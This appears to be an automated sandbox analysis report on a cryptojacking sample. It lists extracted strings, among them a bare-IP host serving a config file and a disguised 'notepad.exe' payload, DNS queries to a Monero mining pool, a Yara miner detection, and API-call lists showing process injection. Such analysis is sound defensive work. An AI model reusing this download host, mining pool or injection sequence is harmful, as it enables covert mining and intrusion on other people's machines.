Source: svchost.exe, 00000007.00000002.762235703.0000022EEA12A000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-22T08:44:38.4912040Z\|\|.\|\|1fd47fbe-cde9-4024-853a-cbf16f3653f1\|\|1152921505693686761\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000007.00000003.739284688.0000022EEA1A9000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 00000007.00000003.739284688.0000022EEA1A9000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 00000007.00000003.739284688.0000022EEA1A9000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac

Source: unknown

DNS traffic detected: queries for: xmr-us-east1.nanopool.org

Source: LZF5sOWnss.exe, 00000000.00000002.705273096.0000000002BB1000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.135
Source: tmp70CEtmp.exe, kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe	String found in binary or memory: http://45.144.225.135/config.txt
Source: tmp70CEtmp.exe, 0000000D.00000002.910423735.00000000011EE000.00000004.00000020.sdmp	String found in binary or memory: http://45.144.225.135/config.txtX
Source: tmp70CEtmp.exe, 0000000D.00000002.910364506.00000000011A8000.00000004.00000020.sdmp	String found in binary or memory: http://45.144.225.135/config.txtes
Source: LZF5sOWnss.exe	String found in binary or memory: http://45.144.225.135/notepad.exe
Source: tmp70CEtmp.exe, 0000000D.00000002.910423735.00000000011EE000.00000004.00000020.sdmp	String found in binary or memory: http://45.144.225.135/notepad.exeB
Source: LZF5sOWnss.exe, 00000000.00000002.705386168.0000000002C28000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.Hbs
Source: svchost.exe, 00000007.00000002.761870341.0000022EE9813000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000007.00000002.762223312.0000022EEA113000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: svchost.exe, 00000007.00000002.761870341.0000022EE9813000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000007.00000002.761870341.0000022EE9813000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000007.00000002.761870341.0000022EE9813000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: LZF5sOWnss.exe, 00000000.00000002.705273096.0000000002BB1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmp70CEtmp.exe, 00000004.00000003.711341370.000000000591E000.00000004.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: tmp70CEtmp.exe, 00000004.00000003.710523038.000000000591F000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: tmp70CEtmp.exe, 00000004.00000003.710523038.000000000591F000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comIta
Source: tmp70CEtmp.exe, 00000004.00000003.710523038.000000000591F000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comV
Source: tmp70CEtmp.exe, 00000004.00000003.710564689.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comcom
Source: tmp70CEtmp.exe, 00000004.00000003.710564689.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comica
Source: tmp70CEtmp.exe, 00000004.00000003.710564689.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comtra
Source: tmp70CEtmp.exe, 00000004.00000003.721477633.0000000005920000.00000004.00000001.sdmp, tmp70CEtmp.exe, 00000004.00000003.714807293.000000000591E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: tmp70CEtmp.exe, 00000004.00000003.714695142.000000000591E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: tmp70CEtmp.exe, 00000004.00000003.716315473.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: tmp70CEtmp.exe, 00000004.00000003.716356964.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlv-se4
Source: tmp70CEtmp.exe, 00000004.00000003.715474589.000000000591F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: tmp70CEtmp.exe, 00000004.00000003.715474589.000000000591F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.htmlP
Source: tmp70CEtmp.exe, 00000004.00000003.716474850.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers;
Source: tmp70CEtmp.exe, 00000004.00000003.715192479.000000000591F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersR
Source: tmp70CEtmp.exe, 00000004.00000003.716512937.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersers;
Source: tmp70CEtmp.exe, 00000004.00000003.716946340.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersu
Source: tmp70CEtmp.exe, 00000004.00000003.710110354.000000000591E000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: svchost.exe, 00000007.00000003.739284688.0000022EEA1A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000007.00000003.739284688.0000022EEA1A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: tmp70CEtmp.exe, 00000004.00000003.718697602.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: tmp70CEtmp.exe, 00000004.00000003.711277231.00000000058F9000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
Source: tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/5.
Source: tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/G
Source: tmp70CEtmp.exe, 00000004.00000003.711277231.00000000058F9000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/N
Source: tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-d
Source: tmp70CEtmp.exe, 00000004.00000003.711277231.00000000058F9000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0DN
Source: tmp70CEtmp.exe, 00000004.00000003.711277231.00000000058F9000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: tmp70CEtmp.exe, 00000004.00000003.711277231.00000000058F9000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/G
Source: tmp70CEtmp.exe, 00000004.00000003.711277231.00000000058F9000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/v
Source: tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/oby
Source: tmp70CEtmp.exe, 00000004.00000003.710770054.00000000058F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/s
Source: tmp70CEtmp.exe, 00000004.00000003.710770054.00000000058F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/sDN
Source: tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/v
Source: tmp70CEtmp.exe, 00000004.00000003.720895206.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.monotype.
Source: tmp70CEtmp.exe, 00000004.00000003.711435516.000000000591E000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: tmp70CEtmp.exe, 00000004.00000003.710633941.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: tmp70CEtmp.exe, 00000004.00000003.710633941.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comslnt
Source: tmp70CEtmp.exe, 00000004.00000003.717061110.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de
Source: tmp70CEtmp.exe, 00000004.00000003.714504589.000000000591E000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de/
Source: tmp70CEtmp.exe, 00000004.00000003.717061110.0000000005920000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.dees
Source: tmp70CEtmp.exe, 00000004.00000003.714504589.000000000591E000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deod
Source: tmp70CEtmp.exe, 00000004.00000002.802365791.0000000002A95000.00000004.00000001.sdmp	String found in binary or memory: https://RtlGetVersionntdll.dll
Source: svchost.exe, 00000007.00000003.749051892.0000022EEA1BE000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.749031213.0000022EEA18D000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000007.00000003.749051892.0000022EEA1BE000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.749031213.0000022EEA18D000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000007.00000003.749051892.0000022EEA1BE000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.749031213.0000022EEA18D000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: csrss.13.dr	String found in binary or memory: https://iconscout.com/legal#licenses
Source: svchost.exe, 00000007.00000003.739284688.0000022EEA1A9000.00000004.00000001.sdmp	String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: svchost.exe, 00000007.00000003.749051892.0000022EEA1BE000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.749031213.0000022EEA18D000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000007.00000003.749051892.0000022EEA1BE000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.749031213.0000022EEA18D000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy
Source: svchost.exe, 00000007.00000003.740802375.0000022EEA17C000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: notepad.exe, 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: notepad.exe, 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: notepad.exe, 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp	String found in binary or memory: https://xmrig.com/wizardOKcpurandomxversioncpuintensitythreadsaffinity

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 15.2.notepad.exe.400000.0.unpack, type: UNPACKEDPE

Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth

Source: C:\Windows\notepad.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00402E40 GetLastError,NtOpenSection,NtMapViewOfSection,NtClose,	13_2_00402E40
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00408A50 NtOpenProcess,GetExitCodeProcess,NtClose,NtClose,	13_2_00408A50
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_004068E0 RtlDosPathNameToNtPathName_U,NtCreateFile,	13_2_004068E0
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00407AF0 GetFileAttributesW,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,	13_2_00407AF0
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00403680 NtCreateFile,	13_2_00403680
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00403CA0 NtClose,GetSystemInfo,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,	13_2_00403CA0
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00406340 GetModuleFileNameW,RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,NtClose,VirtualAlloc,NtClose,NtReadFile,NtClose,VirtualFree,NtClose,RtlDosPathNameToNtPathName_U,VirtualFree,NtCreateFile,NtWriteFile,NtClose,VirtualFree,NtClose,VirtualFree,	13_2_00406340
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00403B50 NtClose,	13_2_00403B50
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00403720 NtCreateFile,NtCreateFile,	13_2_00403720
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00403BC0 NtCreateFile,NtWriteFile,NtClose,NtClose,	13_2_00403BC0
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_004037E0 RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,VirtualAlloc,NtReadFile,NtClose,VirtualFree,NtClose,VirtualFree,NtClose,	13_2_004037E0
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_004029E0 DeleteFileW,RtlImageNtHeader,NtOpenProcess,NtClose,NtAllocateVirtualMemory,VirtualAlloc,GetProcAddress,NtWriteVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,RtlCreateUserThread,NtWaitForSingleObject,Sleep,Sleep,NtWaitForSingleObject,TerminateThread,GetExitCodeThread,NtClose,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtClose,	13_2_004029E0
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00406990 RtlDosPathNameToNtPathName_U,NtCreateFile,	13_2_00406990
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_004085B0 RtlInitUnicodeString,NtOpenKey,GetLastError,RtlInitUnicodeString,GetLastError,NtQueryValueKey,NtClose,NtClose,	13_2_004085B0
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00405420 CreateProcessW,NtQueryInformationProcess,GetCurrentProcess,GetThreadContext,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,GetCurrentProcess,VirtualAlloc,ReadProcessMemory,VirtualFree,VirtualFree,GetProcAddress,Sleep,VirtualAlloc,VirtualFree,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,	13_2_00405420
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00406D50 NtClose,	13_2_00406D50
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00406D70 NtClose,	13_2_00406D70
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00408730 NtOpenProcess,NtTerminateProcess,NtClose,	13_2_00408730
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_004087C0 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,	13_2_004087C0

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 4_2_00FAC114	4_2_00FAC114
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 4_2_00FAE558	4_2_00FAE558
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 4_2_00FAE548	4_2_00FAE548

